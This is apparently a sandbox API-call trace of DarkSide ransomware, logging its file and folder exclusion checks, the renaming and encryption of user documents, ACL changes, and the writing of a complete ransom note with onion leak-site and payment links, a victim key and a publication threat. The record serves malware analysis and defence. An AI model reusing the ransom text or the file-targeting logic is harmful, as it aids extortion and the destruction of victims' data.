[0149.342] wcslen (_String="bootsect.bak") returned 0xc [0149.342] _wcsicmp (_Str1="desktop.ini", _Str2="SZALzgsX8YNlgm.rtf") returned -15 [0149.342] wcslen (_String="desktop.ini") returned 0xb [0149.342] _wcsicmp (_Str1="iconcache.db", _Str2="SZALzgsX8YNlgm.rtf") returned -10 [0149.342] wcslen (_String="iconcache.db") returned 0xc [0149.342] _wcsicmp (_Str1="ntldr", _Str2="SZALzgsX8YNlgm.rtf") returned -5 [0149.342] wcslen (_String="ntldr") returned 0x5 [0149.342] _wcsicmp (_Str1="ntuser.dat", _Str2="SZALzgsX8YNlgm.rtf") returned -5 [0149.342] wcslen (_String="ntuser.dat") returned 0xa [0149.342] _wcsicmp (_Str1="ntuser.dat.log", _Str2="SZALzgsX8YNlgm.rtf") returned -5 [0149.342] wcslen (_String="ntuser.dat.log") returned 0xe [0149.342] _wcsicmp (_Str1="ntuser.ini", _Str2="SZALzgsX8YNlgm.rtf") returned -5 [0149.342] wcslen (_String="ntuser.ini") returned 0xa [0149.342] _wcsicmp (_Str1="thumbs.db", _Str2="SZALzgsX8YNlgm.rtf") returned 1 [0149.342] wcslen (_String="thumbs.db") returned 0x9 [0149.342] _wcsicmp (_Str1="386", _Str2="rtf") returned -63 [0149.342] wcslen (_String="386") returned 0x3 [0149.342] _wcsicmp (_Str1="adv", _Str2="rtf") returned -17 [0149.342] wcslen (_String="adv") returned 0x3 [0149.342] _wcsicmp (_Str1="ani", _Str2="rtf") returned -17 [0149.342] wcslen (_String="ani") returned 0x3 [0149.342] _wcsicmp (_Str1="bat", _Str2="rtf") returned -16 [0149.342] wcslen (_String="bat") returned 0x3 [0149.342] _wcsicmp (_Str1="bin", _Str2="rtf") returned -16 [0149.342] wcslen (_String="bin") returned 0x3 [0149.342] _wcsicmp (_Str1="cab", _Str2="rtf") returned -15 [0149.342] wcslen (_String="cab") returned 0x3 [0149.342] _wcsicmp (_Str1="cmd", _Str2="rtf") returned -15 [0149.342] wcslen (_String="cmd") returned 0x3 [0149.343] _wcsicmp (_Str1="com", _Str2="rtf") returned -15 [0149.343] wcslen (_String="com") returned 0x3 [0149.343] _wcsicmp (_Str1="cpl", _Str2="rtf") returned -15 [0149.343] wcslen (_String="cpl") returned 0x3 [0149.343] _wcsicmp (_Str1="cur", _Str2="rtf") returned -15 [0149.343] wcslen (_String="cur") returned 0x3 [0149.343] _wcsicmp (_Str1="deskthemepack", _Str2="rtf") returned -14 [0149.343] wcslen (_String="deskthemepack") returned 0xd [0149.343] _wcsicmp (_Str1="diagcab", _Str2="rtf") returned -14 [0149.343] wcslen (_String="diagcab") returned 0x7 [0149.343] _wcsicmp (_Str1="diagcfg", _Str2="rtf") returned -14 [0149.343] wcslen (_String="diagcfg") returned 0x7 [0149.343] _wcsicmp (_Str1="diagpkg", _Str2="rtf") returned -14 [0149.343] wcslen (_String="diagpkg") returned 0x7 [0149.343] _wcsicmp (_Str1="dll", _Str2="rtf") returned -14 [0149.343] wcslen (_String="dll") returned 0x3 [0149.343] _wcsicmp (_Str1="drv", _Str2="rtf") returned -14 [0149.343] wcslen (_String="drv") returned 0x3 [0149.343] _wcsicmp (_Str1="exe", _Str2="rtf") returned -13 [0149.343] wcslen (_String="exe") returned 0x3 [0149.343] _wcsicmp (_Str1="hlp", _Str2="rtf") returned -10 [0149.343] wcslen (_String="hlp") returned 0x3 [0149.343] _wcsicmp (_Str1="icl", _Str2="rtf") returned -9 [0149.343] wcslen (_String="icl") returned 0x3 [0149.343] _wcsicmp (_Str1="icns", _Str2="rtf") returned -9 [0149.343] wcslen (_String="icns") returned 0x4 [0149.343] _wcsicmp (_Str1="ico", _Str2="rtf") returned -9 [0149.343] wcslen (_String="ico") returned 0x3 [0149.343] _wcsicmp (_Str1="ics", _Str2="rtf") returned -9 [0149.343] wcslen (_String="ics") returned 0x3 [0149.343] _wcsicmp (_Str1="idx", _Str2="rtf") returned -9 [0149.343] wcslen (_String="idx") returned 0x3 [0149.343] _wcsicmp (_Str1="ldf", _Str2="rtf") returned -6 [0149.343] wcslen (_String="ldf") returned 0x3 [0149.343] _wcsicmp (_Str1="lnk", _Str2="rtf") returned -6 [0149.343] wcslen (_String="lnk") returned 0x3 [0149.343] _wcsicmp (_Str1="mod", _Str2="rtf") returned -5 [0149.343] wcslen (_String="mod") returned 0x3 [0149.344] _wcsicmp (_Str1="mpa", _Str2="rtf") returned -5 [0149.344] wcslen (_String="mpa") returned 0x3 [0149.344] _wcsicmp (_Str1="msc", _Str2="rtf") returned -5 [0149.344] wcslen (_String="msc") returned 0x3 [0149.344] _wcsicmp (_Str1="msp", _Str2="rtf") returned -5 [0149.344] wcslen (_String="msp") returned 0x3 [0149.344] _wcsicmp (_Str1="msstyles", _Str2="rtf") returned -5 [0149.344] wcslen (_String="msstyles") returned 0x8 [0149.344] _wcsicmp (_Str1="msu", _Str2="rtf") returned -5 [0149.344] wcslen (_String="msu") returned 0x3 [0149.344] _wcsicmp (_Str1="nls", _Str2="rtf") returned -4 [0149.344] wcslen (_String="nls") returned 0x3 [0149.344] _wcsicmp (_Str1="nomedia", _Str2="rtf") returned -4 [0149.344] wcslen (_String="nomedia") returned 0x7 [0149.344] _wcsicmp (_Str1="ocx", _Str2="rtf") returned -3 [0149.344] wcslen (_String="ocx") returned 0x3 [0149.344] _wcsicmp (_Str1="prf", _Str2="rtf") returned -2 [0149.344] wcslen (_String="prf") returned 0x3 [0149.344] _wcsicmp (_Str1="ps1", _Str2="rtf") returned -2 [0149.344] wcslen (_String="ps1") returned 0x3 [0149.344] _wcsicmp (_Str1="rom", _Str2="rtf") returned -5 [0149.344] wcslen (_String="rom") returned 0x3 [0149.344] _wcsicmp (_Str1="rtp", _Str2="rtf") returned 10 [0149.344] wcslen (_String="rtp") returned 0x3 [0149.344] _wcsicmp (_Str1="scr", _Str2="rtf") returned 1 [0149.344] wcslen (_String="scr") returned 0x3 [0149.344] _wcsicmp (_Str1="shs", _Str2="rtf") returned 1 [0149.344] wcslen (_String="shs") returned 0x3 [0149.344] _wcsicmp (_Str1="spl", _Str2="rtf") returned 1 [0149.344] wcslen (_String="spl") returned 0x3 [0149.344] _wcsicmp (_Str1="sys", _Str2="rtf") returned 1 [0149.344] wcslen (_String="sys") returned 0x3 [0149.344] _wcsicmp (_Str1="theme", _Str2="rtf") returned 2 [0149.344] wcslen (_String="theme") returned 0x5 [0149.344] _wcsicmp (_Str1="themepack", _Str2="rtf") returned 2 [0149.344] wcslen (_String="themepack") returned 0x9 [0149.345] _wcsicmp (_Str1="wpx", _Str2="rtf") returned 5 [0149.345] wcslen (_String="wpx") returned 0x3 [0149.345] _wcsicmp (_Str1="lock", _Str2="rtf") returned -6 [0149.345] wcslen (_String="lock") returned 0x4 [0149.345] _wcsicmp (_Str1="key", _Str2="rtf") returned -7 [0149.345] wcslen (_String="key") returned 0x3 [0149.345] _wcsicmp (_Str1="hta", _Str2="rtf") returned -10 [0149.345] wcslen (_String="hta") returned 0x3 [0149.345] _wcsicmp (_Str1="msi", _Str2="rtf") returned -5 [0149.345] wcslen (_String="msi") returned 0x3 [0149.345] _wcsicmp (_Str1="pdb", _Str2="rtf") returned -2 [0149.345] wcslen (_String="pdb") returned 0x3 [0149.345] _wcsicmp (_Str1="sql", _Str2="rtf") returned 1 [0149.345] wcslen (_String="sql") returned 0x3 [0149.345] _wcsicmp (_Str1="sqlite", _Str2="rtf") returned 1 [0149.345] wcslen (_String="sqlite") returned 0x6 [0149.345] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal")) returned 0x10 [0149.345] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0149.345] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL" [0149.345] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL") returned 0x31 [0149.345] wcscpy (in: _Dest=0x45000f4, _Source="SZALzgsX8YNlgm.rtf" | out: _Dest="SZALzgsX8YNlgm.rtf") returned="SZALzgsX8YNlgm.rtf" [0149.345] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\SZALzgsX8YNlgm.rtf", dwFileAttributes=0x80) returned 1 [0149.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\SZALzgsX8YNlgm.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\szalzgsx8ynlgm.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x670 [0149.346] SetFilePointerEx (in: hFile=0x670, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.346] ReadFile (in: hFile=0x670, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0149.347] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x4ed31bb7 [0149.347] RtlComputeCrc32 (PartialCrc=0x1bb7, Buffer=0x3fe8f4, Length=0x80) returned 0xf9c50680 [0149.347] RtlComputeCrc32 (PartialCrc=0x680, Buffer=0x3fe8f4, Length=0x80) returned 0xa362a054 [0149.347] RtlComputeCrc32 (PartialCrc=0xa054, Buffer=0x3fe8f4, Length=0x80) returned 0x36fa36b7 [0149.347] RtlComputeCrc32 (PartialCrc=0x36b7, Buffer=0x3fe8f4, Length=0x80) returned 0x142bb0b6 [0149.347] CloseHandle (hObject=0x670) returned 1 [0149.347] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0149.347] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\SZALzgsX8YNlgm.rtf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\SZALzgsX8YNlgm.rtf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\SZALzgsX8YNlgm.rtf" [0149.347] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\SZALzgsX8YNlgm.rtf") returned 0x44 [0149.347] wcscpy (in: _Dest=0x4510120, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.347] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\SZALzgsX8YNlgm.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\szalzgsx8ynlgm.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\SZALzgsX8YNlgm.rtf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\szalzgsx8ynlgm.rtf.c06622a1"), dwFlags=0x8) returned 1 [0149.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\SZALzgsX8YNlgm.rtf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\szalzgsx8ynlgm.rtf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x670 [0149.349] CreateIoCompletionPort (FileHandle=0x670, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0149.349] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4b80020 [0149.356] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xfae1515 [0149.356] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x46125b65 [0149.356] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2560681b [0149.356] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xd21e034 [0149.356] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4a2f6ed9 [0149.356] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x14cd6871 [0149.356] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x76c09a88 [0149.356] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2db388ad [0149.359] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4b80094, Length=0x80) returned 0xd9158697 [0149.359] RtlComputeCrc32 (PartialCrc=0x8697, Buffer=0x4b80094, Length=0x80) returned 0xd5d9727b [0149.359] RtlComputeCrc32 (PartialCrc=0x727b, Buffer=0x4b80094, Length=0x80) returned 0xff383eba [0149.359] RtlComputeCrc32 (PartialCrc=0x3eba, Buffer=0x4b80094, Length=0x80) returned 0xfef7d6e [0149.359] RtlComputeCrc32 (PartialCrc=0x7d6e, Buffer=0x4b80094, Length=0x80) returned 0x49724f76 [0149.359] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4b80020) returned 1 [0149.359] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0149.359] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0149.359] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4fa6d70, ftCreationTime.dwHighDateTime=0x1d5d9fc, ftLastAccessTime.dwLowDateTime=0x9bd76ec0, ftLastAccessTime.dwHighDateTime=0x1d5dc27, ftLastWriteTime.dwLowDateTime=0x9bd76ec0, ftLastWriteTime.dwHighDateTime=0x1d5dc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VoKVB4ZKDkiHr4RSN1", cAlternateFileName="VOKVB4~1")) returned 1 [0149.359] _wcsicmp (_Str1="$recycle.bin", _Str2="VoKVB4ZKDkiHr4RSN1") returned -82 [0149.359] wcslen (_String="$recycle.bin") returned 0xc [0149.359] _wcsicmp (_Str1="config.msi", _Str2="VoKVB4ZKDkiHr4RSN1") returned -19 [0149.359] wcslen (_String="config.msi") returned 0xa [0149.359] _wcsicmp (_Str1="$windows.~bt", _Str2="VoKVB4ZKDkiHr4RSN1") returned -82 [0149.359] wcslen (_String="$windows.~bt") returned 0xc [0149.359] _wcsicmp (_Str1="$windows.~ws", _Str2="VoKVB4ZKDkiHr4RSN1") returned -82 [0149.359] wcslen (_String="$windows.~ws") returned 0xc [0149.359] _wcsicmp (_Str1="windows", _Str2="VoKVB4ZKDkiHr4RSN1") returned 1 [0149.360] wcslen (_String="windows") returned 0x7 [0149.360] _wcsicmp (_Str1="appdata", _Str2="VoKVB4ZKDkiHr4RSN1") returned -21 [0149.360] wcslen (_String="appdata") returned 0x7 [0149.360] _wcsicmp (_Str1="application data", _Str2="VoKVB4ZKDkiHr4RSN1") returned -21 [0149.360] wcslen (_String="application data") returned 0x10 [0149.360] _wcsicmp (_Str1="boot", _Str2="VoKVB4ZKDkiHr4RSN1") returned -20 [0149.360] wcslen (_String="boot") returned 0x4 [0149.360] _wcsicmp (_Str1="google", _Str2="VoKVB4ZKDkiHr4RSN1") returned -15 [0149.360] wcslen (_String="google") returned 0x6 [0149.360] _wcsicmp (_Str1="mozilla", _Str2="VoKVB4ZKDkiHr4RSN1") returned -9 [0149.360] wcslen (_String="mozilla") returned 0x7 [0149.360] _wcsicmp (_Str1="program files", _Str2="VoKVB4ZKDkiHr4RSN1") returned -6 [0149.360] wcslen (_String="program files") returned 0xd [0149.360] _wcsicmp (_Str1="program files (x86)", _Str2="VoKVB4ZKDkiHr4RSN1") returned -6 [0149.360] wcslen (_String="program files (x86)") returned 0x13 [0149.360] _wcsicmp (_Str1="programdata", _Str2="VoKVB4ZKDkiHr4RSN1") returned -6 [0149.360] wcslen (_String="programdata") returned 0xb [0149.360] _wcsicmp (_Str1="system volume information", _Str2="VoKVB4ZKDkiHr4RSN1") returned -3 [0149.360] wcslen (_String="system volume information") returned 0x19 [0149.360] _wcsicmp (_Str1="tor browser", _Str2="VoKVB4ZKDkiHr4RSN1") returned -2 [0149.360] wcslen (_String="tor browser") returned 0xb [0149.360] _wcsicmp (_Str1="windows.old", _Str2="VoKVB4ZKDkiHr4RSN1") returned 1 [0149.360] wcslen (_String="windows.old") returned 0xb [0149.360] _wcsicmp (_Str1="intel", _Str2="VoKVB4ZKDkiHr4RSN1") returned -13 [0149.360] wcslen (_String="intel") returned 0x5 [0149.360] _wcsicmp (_Str1="msocache", _Str2="VoKVB4ZKDkiHr4RSN1") returned -9 [0149.360] wcslen (_String="msocache") returned 0x8 [0149.360] _wcsicmp (_Str1="perflogs", _Str2="VoKVB4ZKDkiHr4RSN1") returned -6 [0149.360] wcslen (_String="perflogs") returned 0x8 [0149.360] _wcsicmp (_Str1="x64dbg", _Str2="VoKVB4ZKDkiHr4RSN1") returned 2 [0149.360] wcslen (_String="x64dbg") returned 0x6 [0149.361] _wcsicmp (_Str1="public", _Str2="VoKVB4ZKDkiHr4RSN1") returned -6 [0149.361] wcslen (_String="public") returned 0x6 [0149.361] _wcsicmp (_Str1="all users", _Str2="VoKVB4ZKDkiHr4RSN1") returned -21 [0149.361] wcslen (_String="all users") returned 0x9 [0149.361] _wcsicmp (_Str1="default", _Str2="VoKVB4ZKDkiHr4RSN1") returned -18 [0149.361] wcslen (_String="default") returned 0x7 [0149.361] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\*" [0149.361] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\*") returned 0x33 [0149.361] wcscpy (in: _Dest=0x44e00e4, _Source="VoKVB4ZKDkiHr4RSN1" | out: _Dest="VoKVB4ZKDkiHr4RSN1") returned="VoKVB4ZKDkiHr4RSN1" [0149.361] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0149.361] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0149.361] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1" [0149.361] GetNamedSecurityInfoW () returned 0x0 [0149.361] SetEntriesInAclW () returned 0x0 [0149.361] SetNamedSecurityInfoW () returned 0x0 [0149.364] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d576f8) returned 1 [0149.364] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe5bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0149.364] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1")) returned 1 [0149.364] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0149.364] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0149.365] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe58c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe58c*=0xa8f, lpOverlapped=0x0) returned 1 [0149.366] CloseHandle (hObject=0x1c) returned 1 [0149.366] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0149.366] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1")) returned 0x10 [0149.366] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\") returned="" [0149.366] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\") returned 0x45 [0149.366] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe7ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe7ec) returned 0x2db87c0 [0149.366] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4fa6d70, ftCreationTime.dwHighDateTime=0x1d5d9fc, ftLastAccessTime.dwLowDateTime=0xd7a43320, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd7a43320, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.366] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d22af30, ftCreationTime.dwHighDateTime=0x1d5e138, ftLastAccessTime.dwLowDateTime=0x6965e510, ftLastAccessTime.dwHighDateTime=0x1d5d8ea, ftLastWriteTime.dwLowDateTime=0x6965e510, ftLastWriteTime.dwHighDateTime=0x1d5d8ea, nFileSizeHigh=0x0, nFileSizeLow=0x14f6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="FwQBsWg0DRr9fAA.ppt", cAlternateFileName="FWQBSW~1.PPT")) returned 1 [0149.366] _wcsicmp (_Str1="FwQBsWg0DRr9fAA.ppt", _Str2="README.c06622a1.TXT") returned -12 [0149.366] wcsstr (_Str="FwQBsWg0DRr9fAA.ppt", _SubStr="README") returned 0x0 [0149.366] _wcsicmp (_Str1="autorun.inf", _Str2="FwQBsWg0DRr9fAA.ppt") returned -5 [0149.366] wcslen (_String="autorun.inf") returned 0xb [0149.366] _wcsicmp (_Str1="boot.ini", _Str2="FwQBsWg0DRr9fAA.ppt") returned -4 [0149.366] wcslen (_String="boot.ini") returned 0x8 [0149.367] _wcsicmp (_Str1="bootfont.bin", _Str2="FwQBsWg0DRr9fAA.ppt") returned -4 [0149.367] wcslen (_String="bootfont.bin") returned 0xc [0149.367] _wcsicmp (_Str1="bootsect.bak", _Str2="FwQBsWg0DRr9fAA.ppt") returned -4 [0149.367] wcslen (_String="bootsect.bak") returned 0xc [0149.367] _wcsicmp (_Str1="desktop.ini", _Str2="FwQBsWg0DRr9fAA.ppt") returned -2 [0149.367] wcslen (_String="desktop.ini") returned 0xb [0149.367] _wcsicmp (_Str1="iconcache.db", _Str2="FwQBsWg0DRr9fAA.ppt") returned 3 [0149.367] wcslen (_String="iconcache.db") returned 0xc [0149.367] _wcsicmp (_Str1="ntldr", _Str2="FwQBsWg0DRr9fAA.ppt") returned 8 [0149.367] wcslen (_String="ntldr") returned 0x5 [0149.367] _wcsicmp (_Str1="ntuser.dat", _Str2="FwQBsWg0DRr9fAA.ppt") returned 8 [0149.367] wcslen (_String="ntuser.dat") returned 0xa [0149.367] _wcsicmp (_Str1="ntuser.dat.log", _Str2="FwQBsWg0DRr9fAA.ppt") returned 8 [0149.367] wcslen (_String="ntuser.dat.log") returned 0xe [0149.367] _wcsicmp (_Str1="ntuser.ini", _Str2="FwQBsWg0DRr9fAA.ppt") returned 8 [0149.367] wcslen (_String="ntuser.ini") returned 0xa [0149.367] _wcsicmp (_Str1="thumbs.db", _Str2="FwQBsWg0DRr9fAA.ppt") returned 14 [0149.367] wcslen (_String="thumbs.db") returned 0x9 [0149.367] _wcsicmp (_Str1="386", _Str2="ppt") returned -61 [0149.367] wcslen (_String="386") returned 0x3 [0149.367] _wcsicmp (_Str1="adv", _Str2="ppt") returned -15 [0149.367] wcslen (_String="adv") returned 0x3 [0149.367] _wcsicmp (_Str1="ani", _Str2="ppt") returned -15 [0149.367] wcslen (_String="ani") returned 0x3 [0149.367] _wcsicmp (_Str1="bat", _Str2="ppt") returned -14 [0149.367] wcslen (_String="bat") returned 0x3 [0149.367] _wcsicmp (_Str1="bin", _Str2="ppt") returned -14 [0149.367] wcslen (_String="bin") returned 0x3 